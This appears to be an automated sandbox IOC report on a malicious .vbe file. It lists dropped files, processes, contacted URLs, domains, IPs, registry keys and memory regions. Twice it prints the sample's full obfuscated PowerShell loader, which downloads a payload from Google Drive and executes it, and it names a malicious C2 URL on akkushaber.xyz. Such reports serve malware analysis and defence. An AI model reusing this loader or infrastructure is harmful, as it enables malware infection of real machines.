IOC Report
EL-25-536_40005512_Le Cuivre_23102024.vbe

loading gif

Files

File Path
Type
Category
Malicious
EL-25-536_40005512_Le Cuivre_23102024.vbe
ASCII text, with CRLF line terminators
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnwyp1oa.1ro.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egwlo1hl.0vg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prnakv1v.obv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3fwfsdu.inh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Gesjftigere.Sig
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnb u.SkibsSPseudESindsC Ja au tuiRAlvorI omneTFrilay.acedp SkydREr trOFilarTHandeObrummCFrowzOtwigslBowleTO kalY Re uPBondeefarew]Tryks:kowto:Uve,sTH emsLNedtrS Omni1Uncu,2Opbyg ');$Halmknippernes=$Kalligrafi[0];$Bedstemanden=(Plumet ' Udtr$ AfgagofficlNonstO Kongb micra UndelSemil: M.rfSq.ateHLast iNedstTPelsvHCusc,eWo dee MonelBille=Dmmekn Ga eeCau oWAllev-SkannOrie.eBEgnsbj Antee QuilcOutsaTCrus SmadrSAcidiY Sou.S SkibtvanitE Tre MAaled.Fon,tN A.miE T edtquins.KaabeWStrave SperbPun,tCInaqul h nrITurisE tyvenT lvrTDemur ');Extralegal ($Bedstemanden);Extralegal (Plumet ',ocks$Misa.SSkudahRottei GnidtReparhFlin,eTa eleUnadvlU tto.TakleH Tille Milla XylodMenine Mar.r Rbens ackd[Ente $ eneFFljlse StilrD doei afskeBarrigsucceiOwasurSjllao nceseSalgsnC eers Bl,s]Aberr=Bryst$PlissRAsia,eAffolsM.dleeEscarrEntrev FitnaLagentDrenciMezzaoUnpernO erss WreasBistrl Lad iPodiapAg rap.odereN bonrU,kin ');$Bathroot=Plumet 'Psal $StivfSBre ih UomtiAarlet Funkhsprede TeeneMonstl.elig.BagatDTightoSter.wF emlnSamirlme ero La iaAffaldLicheFRetouiBoyunlsenlaeD cis(Normo$HumphH iljaa glolF imamNovenkIpom,nIridii oldsp Folkp SupeeFi,kerResumn ForteCubb,sProdu,In,sa$helv.T WorluNabk.nindrygKoppasCoe apGluttaWhoritBefamsFarmb)O fin ';$Tungspats=$Stenotypist;Extralegal (Plumet 'Digte$Ant dgSta kL TourOTabetbMonesA U arLPodz : PyrofRefo.oCle ur S opUKindhrSp ite BoraNLnmodifilstN storG ilpsT,afiS Motik UrocaL snid Pr se ChasrN,nvisEncha2a iog3Konsu=Pitsa(UndepTManneeS,rinsMyrioTSigva- IntepI,dusaKonfotIrnachR.mst hamm$ ,akutargkeUFora.nLeca gSuperS ConsP u.esA ExamtBibliSWefti)Lensg ');while (!$Forureningsskaders23) {Extralegal (Plumet 'Marm $ ygelgBefarlTyve o SandbQuan,aH izelO,ers:Bl ndSLaterpSclera,lvberProvoe SrlokT ianaDe tasBjeacsappreeResp b Dydse Gengs SnydtUndi y fremrRigs e BeknrParene kheps den=A veg$ChecktSjlekrGaffeuG aameCo pa ') ;Extralegal $Bathroot;Extralegal (Plumet 'LearnSSolinTbalsaaIntraRSigtvtM sku- BistSVentrlDrejeEPred eMyriaP.ikke olde4Kavit ');Extralegal (Plumet ' ,ors$FumeuGEjendlHalbeOTerribNonseA Aga LVi.rn:CursoftillioStellrDiazoUFlammRQuickERevoln RavnI rhven BeskGSvlgesEnebosUnr pKGenerAVandld FiskESalgsRMalknSHe to2torun3Unflo=Skysk(Frge TSimioeSuborSHy.oaTSm.gr- Knorp CortAElimaTTangeHT rsk Bed.m$HandltJac eUUntorn AvergNontispionePSuperA DemeT .upes,iner) uggy ') ;Extralegal (Plumet ' Acet$Excreg SubllMyxoboS orob liskAOscilLCarbu:PotenF sertoemeliR SvagsAlimeiK,udeN UndiKReciteStyleL.aaliSO erbeT.araRNonpenAmatrEboligsA phi=Komm $Parmeg.nfumLSo,keONonchbNeuria ZlotlArk v: Hab,CGangloMicroAPairpcBl dfHSlutswFiffihUn luIanisopBenga+Ostle+,urne%carto$Uni.ekBismaaSkumplSprawLPapiriHyph GSal eRPil eAAlu afNeur IJord .Amph,CScripoCult.u Dv rnDekomTTotem ') ;$Halmknippernes=$Kalligrafi[$Forsinkelsernes];}$Forskrerbrt=328123;$Desinficeringers=31343;Extralegal (Plumet 'Desig$Antong orlaLSprucOGirseBSal ta CrucLArome:afskrS Ang tRntgeVBorusNBowsiEHold,rGobsmSrecli Auto=Calqu SpillGOutsoeAntigtBr ss- CoriCVaageOfrdigN Blo,T FlleEDe alNUfredTSgeo, Cisiu$T,lveT .ndeuOve.aNSmigeGUdnytsOk,lePW ttma Kwmit mmolSbhmer ');Extralegal (Plumet 'Botfl$Para,gKphdil,cealoAftrab,estra,rvill,tent:Epip BS ikkiSemessFrsteo ituinHindeo SammkQuadrs Arb eCfhkrrUdbygn BereeSynkrs Frem2Cod.b4Busc 4P.rsi Hloft=Ud yk All.r[Om edSAmas,yAktivsAll ntPhre,e kontmUnder. M rcCNoc.noMoonsnG mmivB evbe NonhrUddantSjusk]phary:F rdr:su erFDrivvr BlinoNetvrmV.olaBPyjamaH.uses Ri.leSi ho6 Mer 4Sagk Sl part Gr irCrowniPuppenUltrag Unto(Dekad$armb,SMonactImplevPlebinComoreInvulrSkkeps.ller)Bredd ');Extralegal (Plumet 'Hjert$,ijouGhardhLDibliOEpicebLo pia,nwanlStof,:SlattgNoninRPartieSvirpwUtrichDampmOVoveuU ricknDandrD rot rese=.catt Inte [Hest SCockayUplifSCo onT yskeEFemkaMSkr v.ImpurtIc noESkiheXCoralTprosp. FloseBecouNVeraycUndisoAdresd ResmiTurboN SkilgU ska] Pneo:Willo:tarveaStatsS RubeCtranqIA atrIQuill. levaG,uzukeRehosTElvenSUdd bT OverRRakl I luskn ygieGSysop(Fr ct$origibTrafiI Dests .aceo MousnT ipaO ,flvkTarapsSrestERepaiRIldnenIndfrEUnsi.sPrede2 Udla4.erog4Lentn)Extem ');Extralegal (Plumet 'Fal e$,agdegGametlindtgoFilmebUdenraComprLEkspo:P stmAJamboNJ,rdasKevi,pThreanS.oleDSummaeComp,NMek.nDSej sE Spons lesh= Damm$ C.stGnaturRF.ansEbr deWLege.H,nsupOBindiUCorncNCunniD Wa t.NyvursJeannuDrageBArt sS BrobTAaregRD,voviPochoNM crog D,se(Oofyu$ Sk yFAbscioForsorSeletS DevekR,ahurGidsee D sir Sem,b HerrRSubj TPalmi,Nonde$ReseddChitie ogtas V rmi HenvNbef,rf Bru,I EkskC ImbreOver,rEnsilIUps,dnLysfoGF,ngoeFitterCapi s Srgm) Fuld ');Extralegal $Anspndendes;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnb u.SkibsSPseudESindsC Ja au tuiRAlvorI omneTFrilay.acedp SkydREr trOFilarTHandeObrummCFrowzOtwigslBowleTO kalY Re uPBondeefarew]Tryks:kowto:Uve,sTH emsLNedtrS Omni1Uncu,2Opbyg ');$Halmknippernes=$Kalligrafi[0];$Bedstemanden=(Plumet ' Udtr$ AfgagofficlNonstO Kongb micra UndelSemil: M.rfSq.ateHLast iNedstTPelsvHCusc,eWo dee MonelBille=Dmmekn Ga eeCau oWAllev-SkannOrie.eBEgnsbj Antee QuilcOutsaTCrus SmadrSAcidiY Sou.S SkibtvanitE Tre MAaled.Fon,tN A.miE T edtquins.KaabeWStrave SperbPun,tCInaqul h nrITurisE tyvenT lvrTDemur ');Extralegal ($Bedstemanden);Extralegal (Plumet ',ocks$Misa.SSkudahRottei GnidtReparhFlin,eTa eleUnadvlU tto.TakleH Tille Milla XylodMenine Mar.r Rbens ackd[Ente $ eneFFljlse StilrD doei afskeBarrigsucceiOwasurSjllao nceseSalgsnC eers Bl,s]Aberr=Bryst$PlissRAsia,eAffolsM.dleeEscarrEntrev FitnaLagentDrenciMezzaoUnpernO erss WreasBistrl Lad iPodiapAg rap.odereN bonrU,kin ');$Bathroot=Plumet 'Psal $StivfSBre ih UomtiAarlet Funkhsprede TeeneMonstl.elig.BagatDTightoSter.wF emlnSamirlme ero La iaAffaldLicheFRetouiBoyunlsenlaeD cis(Normo$HumphH iljaa glolF imamNovenkIpom,nIridii oldsp Folkp SupeeFi,kerResumn ForteCubb,sProdu,In,sa$helv.T WorluNabk.nindrygKoppasCoe apGluttaWhoritBefamsFarmb)O fin ';$Tungspats=$Stenotypist;Extralegal (Plumet 'Digte$Ant dgSta kL TourOTabetbMonesA U arLPodz : PyrofRefo.oCle ur S opUKindhrSp ite BoraNLnmodifilstN storG ilpsT,afiS Motik UrocaL snid Pr se ChasrN,nvisEncha2a iog3Konsu=Pitsa(UndepTManneeS,rinsMyrioTSigva- IntepI,dusaKonfotIrnachR.mst hamm$ ,akutargkeUFora.nLeca gSuperS ConsP u.esA ExamtBibliSWefti)Lensg ');while (!$Forureningsskaders23) {Extralegal (Plumet 'Marm $ ygelgBefarlTyve o SandbQuan,aH izelO,ers:Bl ndSLaterpSclera,lvberProvoe SrlokT ianaDe tasBjeacsappreeResp b Dydse Gengs SnydtUndi y fremrRigs e BeknrParene kheps den=A veg$ChecktSjlekrGaffeuG aameCo pa ') ;Extralegal $Bathroot;Extralegal (Plumet 'LearnSSolinTbalsaaIntraRSigtvtM sku- BistSVentrlDrejeEPred eMyriaP.ikke olde4Kavit ');Extralegal (Plumet ' ,ors$FumeuGEjendlHalbeOTerribNonseA Aga LVi.rn:CursoftillioStellrDiazoUFlammRQuickERevoln RavnI rhven BeskGSvlgesEnebosUnr pKGenerAVandld FiskESalgsRMalknSHe to2torun3Unflo=Skysk(Frge TSimioeSuborSHy.oaTSm.gr- Knorp CortAElimaTTangeHT rsk Bed.m$HandltJac eUUntorn AvergNontispionePSuperA DemeT .upes,iner) uggy ') ;Extralegal (Plumet ' Acet$Excreg SubllMyxoboS orob liskAOscilLCarbu:PotenF sertoemeliR SvagsAlimeiK,udeN UndiKReciteStyleL.aaliSO erbeT.araRNonpenAmatrEboligsA phi=Komm $Parmeg.nfumLSo,keONonchbNeuria ZlotlArk v: Hab,CGangloMicroAPairpcBl dfHSlutswFiffihUn luIanisopBenga+Ostle+,urne%carto$Uni.ekBismaaSkumplSprawLPapiriHyph GSal eRPil eAAlu afNeur IJord .Amph,CScripoCult.u Dv rnDekomTTotem ') ;$Halmknippernes=$Kalligrafi[$Forsinkelsernes];}$Forskrerbrt=328123;$Desinficeringers=31343;Extralegal (Plumet 'Desig$Antong orlaLSprucOGirseBSal ta CrucLArome:afskrS Ang tRntgeVBorusNBowsiEHold,rGobsmSrecli Auto=Calqu SpillGOutsoeAntigtBr ss- CoriCVaageOfrdigN Blo,T FlleEDe alNUfredTSgeo, Cisiu$T,lveT .ndeuOve.aNSmigeGUdnytsOk,lePW ttma Kwmit mmolSbhmer ');Extralegal (Plumet 'Botfl$Para,gKphdil,cealoAftrab,estra,rvill,tent:Epip BS ikkiSemessFrsteo ituinHindeo SammkQuadrs Arb eCfhkrrUdbygn BereeSynkrs Frem2Cod.b4Busc 4P.rsi Hloft=Ud yk All.r[Om edSAmas,yAktivsAll ntPhre,e kontmUnder. M rcCNoc.noMoonsnG mmivB evbe NonhrUddantSjusk]phary:F rdr:su erFDrivvr BlinoNetvrmV.olaBPyjamaH.uses Ri.leSi ho6 Mer 4Sagk Sl part Gr irCrowniPuppenUltrag Unto(Dekad$armb,SMonactImplevPlebinComoreInvulrSkkeps.ller)Bredd ');Extralegal (Plumet 'Hjert$,ijouGhardhLDibliOEpicebLo pia,nwanlStof,:SlattgNoninRPartieSvirpwUtrichDampmOVoveuU ricknDandrD rot rese=.catt Inte [Hest SCockayUplifSCo onT yskeEFemkaMSkr v.ImpurtIc noESkiheXCoralTprosp. FloseBecouNVeraycUndisoAdresd ResmiTurboN SkilgU ska] Pneo:Willo:tarveaStatsS RubeCtranqIA atrIQuill. levaG,uzukeRehosTElvenSUdd bT OverRRakl I luskn ygieGSysop(Fr ct$origibTrafiI Dests .aceo MousnT ipaO ,flvkTarapsSrestERepaiRIldnenIndfrEUnsi.sPrede2 Udla4.erog4Lentn)Extem ');Extralegal (Plumet 'Fal e$,agdegGametlindtgoFilmebUdenraComprLEkspo:P stmAJamboNJ,rdasKevi,pThreanS.oleDSummaeComp,NMek.nDSej sE Spons lesh= Damm$ C.stGnaturRF.ansEbr deWLege.H,nsupOBindiUCorncNCunniD Wa t.NyvursJeannuDrageBArt sS BrobTAaregRD,voviPochoNM crog D,se(Oofyu$ Sk yFAbscioForsorSeletS DevekR,ahurGidsee D sir Sem,b HerrRSubj TPalmi,Nonde$ReseddChitie ogtas V rmi HenvNbef,rf Bru,I EkskC ImbreOver,rEnsilIUps,dnLysfoGF,ngoeFitterCapi s Srgm) Fuld ');Extralegal $Anspndendes;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
 malicious
C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe
"C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe"
malicious
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\SysWOW64\dllhost.exe"
 malicious
C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe
"C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://www.akkushaber.xyz/0mzg/?eBn8=2O13gIliMn3YsUw5a3KzRkO18CQjk9KHJ2ezAhJRRaOqIrVzHHZDa9+gXbVcJvld3ors0lI+gPWWM5QB07s0EfgV3tv6nKYxZWLGcFl7cPul4bAwfY0iYcg=&lvf=o4BpH
104.21.70.11
 malicious
https://habersosyal.xyz
unknown
https://linkpoker.xyz
unknown
https://haberinyeri.xyz
unknown
https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-270x270.jpeg
unknown
https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-32x32.jpeg
unknown
https://contoso.com/License
unknown
https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-180x180.jpeg
unknown
https://gazipasanakliyat.xyz
unknown
https://www.google.com
unknown
https://api.whatsapp.com/send?phone=
unknown
https://drive.google.com/
unknown
https://aka.ms/pscore6lBfq
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/DERYA.gif)
unknown
https://drive.usercontent.google.com
unknown
https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/NAZAN.gif)
unknown
https://apis.google.com
unknown
https://ssl.gstatic.c
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://kayserigercekmasaj.xyz
unknown
https://drive.usercontent.google.com/downl
unknown
https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/yatayreklam.jpg
unknown
http://nuget.org/NuGet.exe
unknown
https://kutahyagercekmasaj.xyz
unknown
https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-192x192.jpeg
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://drive.google.com/V8
unknown
https://go.micro
unknown
https://cdn.ampproject.org/v0/amp-sidebar-0.1.js
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://cdn.ampproject.org/v0/amp-analytics-0.1.js
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com/
unknown
https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=6.6.2
unknown
http://drive.google.com
unknown
https://cdn.ampproject.org/v0.js
unknown
https://genelhaberler.xyz
unknown
https://github.com/Pester/Pester
unknown
https://schema.org/WPHeader
unknown
https://aydingercekmasaj.xyz
unknown
http://crl.micro
unknown
https://drive.google.com/ertificates
unknown
https://girismarsbahis.xyz
unknown
https://bedavabahis.xyz
unknown
https://drive.google.com
unknown
https://izmirgercekmasaj.xyz
unknown
https://aka.ms/pscore68
unknown
https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/aslan.gif
unknown
https://drive.usercontent.google.c
unknown
There are 44 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.akkushaber.xyz
104.21.70.11
 malicious
drive.google.com
142.250.185.78
drive.usercontent.google.com
142.250.186.97

IPs

IP
Domain
Country
Malicious
104.21.70.11
www.akkushaber.xyz
United States
malicious
142.250.185.78
drive.google.com
United States
142.250.185.142
unknown
United States
142.250.186.97
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5E35000
trusted library allocation
page read and write
 malicious
24B35F20000
trusted library allocation
page read and write
 malicious
8BA0000
direct allocation
page execute and read and write
 malicious
9DD1000
direct allocation
page execute and read and write
 malicious
85F0000
trusted library allocation
page read and write
837000
unkown
page readonly
3060000
heap
page read and write
17736992000
heap
page read and write
177349E8000
heap
page read and write
8950000
heap
page read and write
17734A71000
heap
page read and write
24B3E240000
heap
page read and write
C50000
unkown
page readonly
4CA0000
heap
page read and write
24B3E534000
heap
page read and write
CC1027E000
stack
page read and write
4CB9000
heap
page read and write
3670000
trusted library allocation
page read and write
2D99000
heap
page read and write
3471000
heap
page read and write
4C4A000
heap
page read and write
4CB2000
heap
page read and write
4CA6000
heap
page read and write
835000
unkown
page read and write
4BE0000
direct allocation
page read and write
24B27C87000
trusted library allocation
page read and write
A50000
heap
page read and write
24B3E3B0000
heap
page execute and read and write
8510000
trusted library allocation
page read and write
1773693F000
heap
page read and write
2014F000
stack
page read and write
7A6D000
stack
page read and write
CC1120D000
stack
page read and write
57D8000
trusted library allocation
page read and write
7829000
heap
page read and write
4CB9000
heap
page read and write
177349EE000
heap
page read and write
3480000
heap
page read and write
24B25EB1000
trusted library allocation
page read and write
4CB2000
heap
page read and write
78E6000
heap
page read and write
17736946000
heap
page read and write
8650000
heap
page read and write
CC10438000
stack
page read and write
2D04000
unkown
page read and write
4BA8000
trusted library allocation
page read and write
5DC1000
trusted library allocation
page read and write
24B25D20000
heap
page read and write
A40000
heap
page readonly
17736957000
heap
page read and write
3B20000
trusted library allocation
page read and write
1773691D000
heap
page read and write
326E000
stack
page read and write
3470000
trusted library section
page read and write
FE0000
unkown
page readonly
4F4F000
stack
page read and write
17734940000
heap
page read and write
21852000
unclassified section
page execute and read and write
177349F5000
heap
page read and write
24B25CC0000
trusted library allocation
page read and write
204D1000
heap
page read and write
24B26342000
trusted library allocation
page read and write
891E000
heap
page read and write
222C3000
unclassified section
page execute and read and write
4AD0000
trusted library allocation
page read and write
7280000
direct allocation
page read and write
3620000
trusted library allocation
page read and write
3A9D000
direct allocation
page execute and read and write
2E00000
remote allocation
page execute and read and write
600000
unkown
page readonly
24B241F0000
heap
page read and write
72A0000
direct allocation
page read and write
24B26346000
trusted library allocation
page read and write
24B26AC2000
trusted library allocation
page read and write
30096FD000
stack
page read and write
730000
heap
page read and write
4CFC000
heap
page read and write
88DC000
heap
page read and write
327F000
heap
page read and write
8BD0000
direct allocation
page read and write
3270000
heap
page read and write
A3C000
stack
page read and write
9D0000
heap
page read and write
4D05000
heap
page read and write
24B3E530000
heap
page read and write
88F0000
heap
page read and write
20542000
heap
page read and write
737A000
stack
page read and write
4CBF000
heap
page read and write
4B8E000
stack
page read and write
AD0000
unkown
page readonly
2BD0000
direct allocation
page read and write
4CBD000
